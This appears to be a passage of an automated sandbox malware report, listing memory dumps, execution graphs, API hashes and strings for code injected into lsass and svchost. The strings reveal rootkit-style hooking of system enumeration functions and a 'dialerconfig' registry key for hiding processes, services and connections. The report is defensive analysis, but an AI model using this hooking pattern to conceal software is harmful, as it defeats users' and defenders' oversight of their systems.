                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$Process$AllocFree
                                                                                                      • String ID:
                                                                                                      • API String ID: 756756679-0
                                                                                                      • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                                                      • Instruction ID: 74932e0283a2c71fab83ba2a11ce92d591547364baf8ceeb3335838a3e95af85
                                                                                                      • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                                                      • Instruction Fuzzy Hash: F621B872606B80C1EB518F99F50825AF7A4FBC4BA8F5D4114DE8C47B14EF79D962C700
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$AllocProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 1617791916-0
                                                                                                      • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                                                                      • Instruction ID: 9febc9d902099fdd90ab40fd79bdbe869aa8fefa1b12d3ce2ae1fbb4bad40dcc
                                                                                                      • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                                                                      • Instruction Fuzzy Hash: 07E039F1612700C6E7448BAAD8093493AE5FB88B25F88C028C90907350DF7E99A9C740

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:0.7%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:74
                                                                                                      Total number of Limit Nodes:2
                                                                                                      execution_graph 14006 1f0275e2908 14008 1f0275e2936 14006->14008 14007 1f0275e2a2b LoadLibraryA 14007->14008 14008->14007 14009 1f0275e2aa7 14008->14009 14010 1f027611c28 14016 1f027611650 GetProcessHeap HeapAlloc 14010->14016 14012 1f027611c3e Sleep SleepEx 14014 1f027611c37 14012->14014 14014->14012 14015 1f0276115c0 StrCmpIW StrCmpW 14014->14015 14060 1f0276118dc 14014->14060 14015->14014 14078 1f027611274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14016->14078 14018 1f027611678 14079 1f027611274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14018->14079 14020 1f027611689 14080 1f027611274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14020->14080 14022 1f027611692 14081 1f027611274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14022->14081 14024 1f02761169b 14025 1f0276116b6 RegOpenKeyExW 14024->14025 14026 1f0276116e8 RegOpenKeyExW 14025->14026 14027 1f0276118ce 14025->14027 14028 1f027611711 14026->14028 14029 1f027611727 RegOpenKeyExW 14026->14029 14027->14014 14082 1f0276112c8 RegQueryInfoKeyW 14028->14082 14031 1f027611762 RegOpenKeyExW 14029->14031 14032 1f02761174b 14029->14032 14035 1f027611786 14031->14035 14036 1f02761179d RegOpenKeyExW 14031->14036 14092 1f02761104c RegQueryInfoKeyW 14032->14092 14038 1f0276112c8 16 API calls 14035->14038 14039 1f0276117c1 14036->14039 14040 1f0276117d8 RegOpenKeyExW 14036->14040 14043 1f027611793 RegCloseKey 14038->14043 14044 1f0276112c8 16 API calls 14039->14044 14041 1f027611813 RegOpenKeyExW 14040->14041 14042 1f0276117fc 14040->14042 14046 1f027611837 14041->14046 14047 1f02761184e RegOpenKeyExW 14041->14047 14045 1f0276112c8 16 API calls 14042->14045 14043->14036 14048 1f0276117ce RegCloseKey 14044->14048 14049 1f027611809 RegCloseKey 14045->14049 14050 1f02761104c 6 API calls 14046->14050 14051 1f027611872 14047->14051 14052 1f027611889 RegOpenKeyExW 14047->14052 14048->14040 14049->14041 14053 1f027611844 RegCloseKey 14050->14053 14054 1f02761104c 6 API calls 14051->14054 14055 1f0276118c4 RegCloseKey 14052->14055 14056 1f0276118ad 14052->14056 14053->14047 14057 1f02761187f RegCloseKey 14054->14057 14055->14027 14058 1f02761104c 6 API calls 14056->14058 14057->14052 14059 1f0276118ba RegCloseKey 14058->14059 14059->14055 14103 1f0276114b4 14060->14103 14078->14018 14079->14020 14080->14022 14081->14024 14083 1f027611334 GetProcessHeap HeapAlloc 14082->14083 14084 1f027611499 RegCloseKey 14082->14084 14085 1f027611485 GetProcessHeap HeapFree 14083->14085 14086 1f02761135d RegEnumValueW 14083->14086 14084->14029 14085->14084 14087 1f0276113af 14086->14087 14087->14085 14087->14086 14089 1f0276113dd GetProcessHeap HeapAlloc 14087->14089 14090 1f02761142f lstrlenW GetProcessHeap HeapAlloc StrCpyW 14087->14090 14091 1f027611413 GetProcessHeap HeapFree 14087->14091 14098 1f027611554 14087->14098 14089->14087 14090->14087 14091->14090 14093 1f0276111b5 RegCloseKey 14092->14093 14096 1f0276110b9 14092->14096 14093->14031 14094 1f0276110c7 RegEnumValueW 14094->14096 14095 1f027611149 GetProcessHeap HeapAlloc 14095->14096 14096->14093 14096->14094 14096->14095 14097 1f02761117f GetProcessHeap HeapFree 14096->14097 14097->14096 14099 1f0276115a4 14098->14099 14100 1f02761156e 14098->14100 14099->14087 14100->14099 14101 1f027611585 StrCmpIW 14100->14101 14102 1f02761158d StrCmpW 14100->14102 14101->14100 14102->14100 14104 1f0276114d1 GetProcessHeap HeapFree 14103->14104 14105 1f0276114f0 GetProcessHeap HeapFree 14103->14105 14104->14104 14104->14105 14106 1f02761150f 14105->14106 14106->14106 14107 1f02761152a GetProcessHeap HeapFree 14106->14107

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$AllocProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 1617791916-0
                                                                                                      • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                                                                      • Instruction ID: 39f72e20338487d9092e3fc25642065dbba9278f3e93ce9d145107bc3186d57d
                                                                                                      • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                                                                      • Instruction Fuzzy Hash: 9AE0C97171160186EB469B67D81C3A976E1FB8CB51F498024CD490B352DF7D8499CB60

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                                      • String ID:
                                                                                                      • API String ID: 1683269324-0
                                                                                                      • Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                                                                      • Instruction ID: 769ff223f1963380d71eaf2fa166587c6c99db784503e7904508fb420e2c2aaa
                                                                                                      • Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                                                                      • Instruction Fuzzy Hash: DF11277061461382FFA397A6A80E7F92694BB5C704F8840359E1A852A7EF3DC0488630

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 000001F027611650: GetProcessHeap.KERNEL32 ref: 000001F02761165B
                                                                                                        • Part of subcall function 000001F027611650: HeapAlloc.KERNEL32 ref: 000001F02761166A
                                                                                                        • Part of subcall function 000001F027611650: RegOpenKeyExW.ADVAPI32 ref: 000001F0276116DA
                                                                                                        • Part of subcall function 000001F027611650: RegOpenKeyExW.ADVAPI32 ref: 000001F027611707
                                                                                                        • Part of subcall function 000001F027611650: RegCloseKey.ADVAPI32 ref: 000001F027611721
                                                                                                        • Part of subcall function 000001F027611650: RegOpenKeyExW.ADVAPI32 ref: 000001F027611741
                                                                                                        • Part of subcall function 000001F027611650: RegCloseKey.ADVAPI32 ref: 000001F02761175C
                                                                                                        • Part of subcall function 000001F027611650: RegOpenKeyExW.ADVAPI32 ref: 000001F02761177C
                                                                                                        • Part of subcall function 000001F027611650: RegCloseKey.ADVAPI32 ref: 000001F027611797
                                                                                                        • Part of subcall function 000001F027611650: RegOpenKeyExW.ADVAPI32 ref: 000001F0276117B7
                                                                                                        • Part of subcall function 000001F027611650: RegCloseKey.ADVAPI32 ref: 000001F0276117D2
                                                                                                        • Part of subcall function 000001F027611650: RegOpenKeyExW.ADVAPI32 ref: 000001F0276117F2
                                                                                                      • Sleep.KERNEL32 ref: 000001F027611C43
                                                                                                      • SleepEx.KERNELBASE ref: 000001F027611C49
                                                                                                        • Part of subcall function 000001F027611650: RegCloseKey.ADVAPI32 ref: 000001F02761180D
                                                                                                        • Part of subcall function 000001F027611650: RegOpenKeyExW.ADVAPI32 ref: 000001F02761182D
                                                                                                        • Part of subcall function 000001F027611650: RegCloseKey.ADVAPI32 ref: 000001F027611848
                                                                                                        • Part of subcall function 000001F027611650: RegOpenKeyExW.ADVAPI32 ref: 000001F027611868
                                                                                                        • Part of subcall function 000001F027611650: RegCloseKey.ADVAPI32 ref: 000001F027611883
                                                                                                        • Part of subcall function 000001F027611650: RegOpenKeyExW.ADVAPI32 ref: 000001F0276118A3
                                                                                                        • Part of subcall function 000001F027611650: RegCloseKey.ADVAPI32 ref: 000001F0276118BE
                                                                                                        • Part of subcall function 000001F027611650: RegCloseKey.ADVAPI32 ref: 000001F0276118C8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 1534210851-0
                                                                                                      • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                                                                      • Instruction ID: 50832f6ef237f11418c790ed9e53513f4c61cb160201ef3ddb8a3aa0734b5c08
                                                                                                      • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                                                                      • Instruction Fuzzy Hash: 1231A875600A0391FF9A9B76DA5D3FA12A5BB4CBD0F9850319E0D87797EF24C8608270

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 58 1f027613930-1f02761393b 59 1f027613955-1f02761395c 58->59 60 1f02761393d-1f027613950 StrCmpNIW 58->60 60->59 61 1f027613952 60->61 61->59
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: dialer
                                                                                                      • API String ID: 0-3528709123
                                                                                                      • Opcode ID: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
                                                                                                      • Instruction ID: df55c6c6731c03e2e4e3cd3c9bb31517775ad4e6391b751aad1d032fdb346e55
                                                                                                      • Opcode Fuzzy Hash: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
                                                                                                      • Instruction Fuzzy Hash: E6D05E3031120BC6FF569FA2888D2B02350BB18705F8880318E0642216E7188D8DC720

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001C.00000002.12793830087.000001F0275E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F0275E0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_28_2_1f0275e0000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad
                                                                                                      • String ID:
                                                                                                      • API String ID: 1029625771-0
                                                                                                      • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                                                      • Instruction ID: b768088d5cb631ebd83b3f2aa9c734cd0d06b688a7f2e516d608a0a0ad7de0db
                                                                                                      • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                                                      • Instruction Fuzzy Hash: 4D61F232701A6287EF69CF1594487BEF396FB0CBA4F148025DA590778ADBB8D952C720

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 208 1f027612cdc-1f027612d55 call 1f02762ecc0 211 1f027613090-1f0276130b3 208->211 212 1f027612d5b-1f027612d61 208->212 212->211 213 1f027612d67-1f027612d6a 212->213 213->211 214 1f027612d70-1f027612d73 213->214 214->211 215 1f027612d79-1f027612d89 GetModuleHandleA 214->215 216 1f027612d8b-1f027612d9b GetProcAddress 215->216 217 1f027612d9d 215->217 218 1f027612da0-1f027612dbe 216->218 217->218 218->211 220 1f027612dc4-1f027612de3 StrCmpNIW 218->220 220->211 221 1f027612de9-1f027612ded 220->221 221->211 222 1f027612df3-1f027612dfd 221->222 222->211 223 1f027612e03-1f027612e0a 222->223 223->211 224 1f027612e10-1f027612e23 223->224 225 1f027612e33 224->225 226 1f027612e25-1f027612e31 224->226 227 1f027612e36-1f027612e3a 225->227 226->227 228 1f027612e4a 227->228 229 1f027612e3c-1f027612e48 227->229 230 1f027612e4d-1f027612e57 228->230 229->230 231 1f027612f4d-1f027612f51 230->231 232 1f027612e5d-1f027612e60 230->232 233 1f027613082-1f02761308a 231->233 234 1f027612f57-1f027612f5a 231->234 235 1f027612e72-1f027612e7c 232->235 236 1f027612e62-1f027612e6f call 1f027611a14 232->236 233->211 233->224 239 1f027612f6b-1f027612f75 234->239 240 1f027612f5c-1f027612f68 call 1f027611a14 234->240 237 1f027612eb0-1f027612eba 235->237 238 1f027612e7e-1f027612e8b 235->238 236->235 243 1f027612eea-1f027612eed 237->243 244 1f027612ebc-1f027612ec9 237->244 238->237 242 1f027612e8d-1f027612e9a 238->242 246 1f027612fa5-1f027612fa8 239->246 247 1f027612f77-1f027612f84 239->247 240->239 251 1f027612e9d-1f027612ea3 242->251 253 1f027612efb-1f027612f08 lstrlenW 243->253 254 1f027612eef-1f027612ef9 call 1f027611d28 243->254 244->243 252 1f027612ecb-1f027612ed8 244->252 249 1f027612fb5-1f027612fc2 lstrlenW 246->249 250 1f027612faa-1f027612fb3 call 1f027611d28 246->250 247->246 256 1f027612f86-1f027612f93 247->256 260 1f027612fe5-1f027612fef call 1f027613930 249->260 261 1f027612fc4-1f027612fce 249->261 250->249 275 1f027612ffa-1f027613005 250->275 258 1f027612f43-1f027612f48 251->258 259 1f027612ea9-1f027612eae 251->259 262 1f027612edb-1f027612ee1 252->262 264 1f027612f2b-1f027612f3d call 1f027613930 253->264 265 1f027612f0a-1f027612f14 253->265 254->253 254->258 266 1f027612f96-1f027612f9c 256->266 269 1f027612ff2-1f027612ff4 258->269 259->237 259->251 260->269 261->260 270 1f027612fd0-1f027612fe3 call 1f027611554 261->270 262->258 271 1f027612ee3-1f027612ee8 262->271 264->258 264->269 265->264 274 1f027612f16-1f027612f29 call 1f027611554 265->274 266->275 276 1f027612f9e-1f027612fa3 266->276 269->233 269->275 270->260 270->275 271->243 271->262 274->258 274->264 281 1f027613007-1f02761300b 275->281 282 1f02761307c-1f027613080 275->282 276->246 276->266 285 1f027613013-1f02761302d call 1f0276186a0 281->285 286 1f02761300d-1f027613011 281->286 282->233 287 1f027613030-1f027613033 285->287 286->285 286->287 290 1f027613035-1f027613053 call 1f0276186a0 287->290 291 1f027613056-1f027613059 287->291 290->291 291->282 293 1f02761305b-1f027613079 call 1f0276186a0 291->293 293->282
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                                      • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                      • API String ID: 2119608203-3850299575
                                                                                                      • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                                                      • Instruction ID: f6131495e4c769c1b20a3c331423c4b879ffc5ddb51f1cf99c6df2edd86c0d33
                                                                                                      • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                                                      • Instruction Fuzzy Hash: D6B18E7231069289EF968F26D54C7FA63A4F748B84F985036EE0E53796DB35CC40C760

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 3140674995-0
                                                                                                      • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                                                      • Instruction ID: 15ed293c735d76768479c66e754ad9ad9ea3a81ea838c95b174616b00e7f1b4f
                                                                                                      • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                                                      • Instruction Fuzzy Hash: AA314372205B8299EF619F61E8587ED7364F748744F44442ADA4D47B9AEF38C648C720
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 1239891234-0
                                                                                                      • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                                                      • Instruction ID: 4291e19c413e1b04934ccdcbfb04809494e4f2cc8789d4055f33ab3e578f558c
                                                                                                      • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                                                      • Instruction Fuzzy Hash: 5C314D32214B8286DB61CF25E85C3EE73A4F78C754F940126EA9D43BAADF38C655CB50
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                                                      • String ID:
                                                                                                      • API String ID: 1443284424-0
                                                                                                      • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                                                      • Instruction ID: 9c6316af1d12b76cc817c7afe1137a84c7276347d9324f9a4433d6be8c28b810
                                                                                                      • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                                                      • Instruction Fuzzy Hash: 84E1DF32708A829AEB42CF65D58C2ED7BB1F3497C8F544126EE4E57B9ADB34C41AC710

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                      • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                      • API String ID: 106492572-2879589442
                                                                                                      • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                                                                      • Instruction ID: 03792473218b70d612c775944d86514a25ea7c43e4b840cb06cd7911a1fddba7
                                                                                                      • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                                                                      • Instruction Fuzzy Hash: 01710736710A5286EF629F66E89C6E927A4FB8CB88F445131DE4D47B6ADF38C444C720

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                      • String ID: d
                                                                                                      • API String ID: 2005889112-2564639436
                                                                                                      • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                                                                      • Instruction ID: d47a3d791a350b908488e5ae454f5aea9f87ecf6f8a38f24742ab4d805b48a9d
                                                                                                      • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                                                                      • Instruction Fuzzy Hash: 71515C72214B4693EB56CF62E54C3AAB3A1F78CB84F488135DE8907B16EF38C555CB50

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentThread$AddressHandleModuleProc
                                                                                                      • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                                      • API String ID: 4175298099-1975688563
                                                                                                      • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                                                                      • Instruction ID: 693e1f981722661cf4da3a3027a43db2bffa43d9984e210e4aaba8c9aa48a896
                                                                                                      • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                                                                      • Instruction Fuzzy Hash: 51319A74610A4BA4FF87EBA5EC5E6F52320BB4C344FC144339E1D026679F798649CBA0

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                                      • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                                      • API String ID: 2171963597-1373409510
                                                                                                      • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                                                                      • Instruction ID: 7741450e065e8c070e5601b2aab8bffcf0e757305a8ad3b7cd0466bad59d375f
                                                                                                      • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                                                                      • Instruction Fuzzy Hash: 8F21303571464282FB518B25E54C3AA73A0F789BA4F544225DE5902FAACF3CC149CF10

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 306 1f02761d2cc-1f02761d322 307 1f02761d483 306->307 308 1f02761d328-1f02761d32b 306->308 309 1f02761d485-1f02761d4a1 307->309 310 1f02761d335-1f02761d338 308->310 311 1f02761d32d-1f02761d330 308->311 312 1f02761d417 310->312 313 1f02761d33e-1f02761d34c 310->313 311->309 314 1f02761d419-1f02761d41c 312->314 315 1f02761d34e-1f02761d351 313->315 316 1f02761d35c-1f02761d37b LoadLibraryExW 313->316 319 1f02761d468-1f02761d47b 314->319 320 1f02761d41e-1f02761d42d GetProcAddress 314->320 321 1f02761d403-1f02761d40a 315->321 322 1f02761d357 315->322 317 1f02761d3cc-1f02761d3d6 316->317 318 1f02761d37d-1f02761d386 GetLastError 316->318 329 1f02761d3e5-1f02761d3f3 317->329 330 1f02761d3d8-1f02761d3e3 317->330 325 1f02761d3ca 318->325 326 1f02761d388-1f02761d39f call 1f02761ad28 318->326 319->307 327 1f02761d461 320->327 328 1f02761d42f-1f02761d456 320->328 321->313 323 1f02761d410 321->323 324 1f02761d3fe-1f02761d401 322->324 323->312 324->321 333 1f02761d458-1f02761d45f 324->333 325->317 326->325 335 1f02761d3a1-1f02761d3b5 call 1f02761ad28 326->335 327->319 328->309 329->324 332 1f02761d3f5-1f02761d3f8 FreeLibrary 329->332 330->321 332->324 333->314 335->325 338 1f02761d3b7-1f02761d3c8 LoadLibraryExW 335->338 338->317
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc
                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                      • API String ID: 190572456-537541572
                                                                                                      • Opcode ID: f5082d46cd3e032fbbfcba80e3c796c34016e7f71c0b089d04f54faabee83c69
                                                                                                      • Instruction ID: c1366c288c4058e876ec296a9402a66f520ce18337676196249ae6a1c7949db9
                                                                                                      • Opcode Fuzzy Hash: f5082d46cd3e032fbbfcba80e3c796c34016e7f71c0b089d04f54faabee83c69
                                                                                                      • Instruction Fuzzy Hash: ED41AC71311A4281FF67CF57A80C7F96391BB0DBD0F9845369D1D8B796EB38D40A8260

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                      • String ID: d
                                                                                                      • API String ID: 3743429067-2564639436
                                                                                                      • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                                                                      • Instruction ID: 05b88d8945427ddd246e36ae75a8c4ba20eccb38a3a7dae10e458720b97f3d80
                                                                                                      • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                                                                      • Instruction Fuzzy Hash: 77419033614B8197EB66CF62E44D7EAB7A1F388B84F448125DB8907B55DF38C164CB10

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
